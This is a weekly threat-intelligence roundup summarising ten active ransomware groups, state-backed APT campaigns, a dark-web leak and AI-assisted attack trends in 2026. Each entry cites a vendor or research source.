Threat Radar: Top 10 Active Threats, APTs & Dark Web Alerts (This Week)
1. Qilin Ransomware (RaaS) — Most Active Global Threat
Qilin (also known as Agenda) remains the world’s most active ransomware group in 2026, leading both disclosed and undisclosed attack charts. It was responsible for 22% of Q1 2026 ransomware attacks in disclosed incidents (22/264 attacks) and 339 undisclosed attacks (16% share). Qilin targets healthcare, manufacturing, government, and education using double-extortion, BYOVD (Bring Your Own Vulnerable Driver) for EDR bypass, and a 2025-added DDoS pressure capability.
Source: BlackFog Q1 2026 Report / CybelAngel — https://www.blackfog.com/the-state-of-ransomware-2026/
2. The Gentlemen RaaS — Internal Breach Reveals 1,570+ Victims
The Gentlemen ransomware-as-a-service group, which emerged in mid-2025, suffered a significant internal C2 infrastructure breach in early May 2026, revealing over 1,570 linked victims — far more than the 412 publicly listed on their leak site. The group offers affiliates a 90% revenue share and has claimed ~332 published victims in just the first five months of 2026 alone. Check Point Research confirmed 8 unique affiliate TOX IDs and 29 documented campaigns.
Source: Check Point Research / Shieldworkz — https://research.checkpoint.com/2026/thus-spoke-the-gentlemen/
3. TeamPCP — New Threat Syndicate Behind Supply Chain Wave
TeamPCP is a newly identified threat syndicate responsible for the Megalodon GitHub Actions attack, the TanStack/Mini Shai-Hulud npm supply chain campaign, and the related Grafana and GitHub breaches this week. The group uses information stealer infections to harvest developer GitHub credentials, then automates mass repository backdooring via CI/CD pipelines. The Cloud Security Alliance has designated this as a two-wave AI developer supply chain attack.
Source: Cloud Security Alliance / Ossprey — https://labs.cloudsecurityalliance.org/research/csa-research-note-shai-hulud-megalodon-supply-chain-cascade/
4. Salt Typhoon (PRC) — Persistent Telecom & Government Espionage
Salt Typhoon, the China-aligned APT, achieved confirmed deep, persistent access to U.S. government communications networks in January 2026 and continues to expand its footprint. The related group UAT-7290 is simultaneously targeting U.S. and allied telecoms through edge-device vulnerability exploitation. Salt Typhoon was one of the dominant APT groups of 2025 and has continued sustained operations in 2026 targeting government and telecommunications networks.
Source: Trend Micro / CloudSEK — https://www.trendmicro.com/en_us/research/26/d/us-public-sector-under-siege.html
5. Handala (Iranian MOIS) — Targeting Military Personnel via WhatsApp
Handala (also known as Void Manticore, Storm-0842, BANISHED KITTEN) is conducting active campaigns targeting military personnel in the Gulf region, sending spoofed WhatsApp business messages warning of missile and drone strikes to deliver malware. The group previously conducted the infamous Stryker attack (March 2026), wiping 200,000 devices through compromised Microsoft Intune in under five hours — with no malware deployed, using only legitimate MDM commands.
Source: Help AG / CovertSwarm — https://www.helpag.com/top-middle-east-cyber-threats-06-may-2026/
6. APT34 / OilRig (Iran) — MENA Spear-Phishing Escalation
APT-C-49 / OilRig (APT34) is conducting sophisticated spear-phishing campaigns using macro-enabled Excel files themed on Middle East regional events, with macros triggering multi-stage C# attacks that retrieve data from GitHub, extract steganographic content from Google Drive images, and establish persistence via scheduled tasks with Telegram Bot API C2 channels. The campaign specifically targets Gulf government, financial, and telecom sectors.
Source: Help AG / RH-ISAC — https://www.helpag.com/top-middle-east-cyber-threats-06-may-2026/
7. Lazarus / BlueNoroff (DPRK) — Web3 & Crypto Deep Fake Attacks
BlueNoroff (a Lazarus Group sub-cluster) is conducting targeted attacks against Web3 and cryptocurrency organizations using fake Zoom invitations that redirect victims to malicious webcam-capture interfaces. The group steals cryptocurrency wallet credentials, hijacks Telegram sessions, and then uses the stolen data to generate deepfake content for more convincing follow-on social engineering. This activity is part of North Korea’s continued state-sponsored cryptocurrency theft operations.
Source: Help AG — https://www.helpag.com/top-middle-east-cyber-threats-06-may-2026/
8. Interlock Ransomware — Exploiting Cisco FMC CVE-2026-20131
Recorded Future’s Insikt Group confirmed that the Interlock ransomware group is actively exploiting CVE-2026-20131, a critical deserialization-of-untrusted-data vulnerability in Cisco Secure Firewall Management Center (FMC), to execute arbitrary Java code as root on vulnerable perimeter devices. This technique allows unauthenticated remote initial access without any user interaction, giving Interlock a highly efficient network entry vector for enterprises running unpatched Cisco FMC.
Source: Recorded Future — https://www.recordedfuture.com/blog/march-2026-cve-landscape
9. Dark Web: Gentlemen RaaS Breach & Affiliate Data Leak
The May 2026 breach of The Gentlemen’s internal Rocket database has created significant dark web activity, with affiliate profiles, victim lists, and negotiation logs now circulating on underground forums. The breach exposes the professional RaaS operational model including legal support features (“Call Lawyer”), affiliate recruitment channels, and the full scope of double-extortion operations across manufacturing, healthcare, and insurance sectors in APAC, MENA, and the Americas.
Source: Ransomware.live / Check Point Research — http://www.ransomware.live/group/thegentlemen
10. Agentic AI in Attack Chains — Fully Autonomous Ransomware Recon
Threat actors are now deploying agentic AI to autonomously handle reconnaissance, vulnerability scanning, victim prioritization, and ransom negotiations — dramatically reducing the human effort required per attack. The Tsundere Bot, a purpose-built initial access tool, automates credential theft and persistence as a ransomware precursor. IBM X-Force reports a 49% year-on-year increase in active ransomware groups, many now leveraging AI as part of their operational pipeline.
Source: Trend Micro / IBM X-Force 2026 — https://www.trendmicro.com/en_us/research/26/d/us-public-sector-under-siege.html